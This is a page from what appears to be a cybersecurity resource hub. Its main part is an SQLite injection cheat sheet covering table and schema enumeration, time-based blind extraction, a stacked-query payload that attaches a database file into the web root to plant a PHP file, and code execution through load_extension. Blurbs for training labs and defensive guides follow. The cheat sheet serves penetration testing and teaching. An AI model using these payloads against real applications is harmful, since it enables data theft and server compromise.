Innovative hub for cybersecurity events and initiatives.
If you need You use Concatenation || Comments -- Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' Substring substr(string,start,stop) Length length(string) Quotes without literal quotes cast(X'27' as text) --use X'22' for double quotes Table name enumeration SELECT name FROM sqlite_master WHERE type='table' Table schema enumeration SELECT sql FROM sqlite_master WHERE type='table' Time-based data extraction cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true' File writing 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled Arbitrary Code Execution load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration
Innovative hub for cybersecurity events and initiatives.
A cybersecurity challenge where you play the role of an incident response consultant investigating an intrusion at Precision Widgets of North Dakota.
An intentionally insecure Android app designed to teach developers and security professionals about common app vulnerabilities.
A comprehensive guide for using Docker with detailed information on prerequisites, installation, containers, images, networks, and more.
Instructions for setting up SIREN, including downloading Linux dependencies, cloning the repository, setting up virtual environment, installing pip requirements, running SIREN, setting up Snort on Pi, and MySQL setup.
A comprehensive guide to understanding and responding to modern ransomware attacks, covering incident response, cyber threat intelligence, and forensic analysis.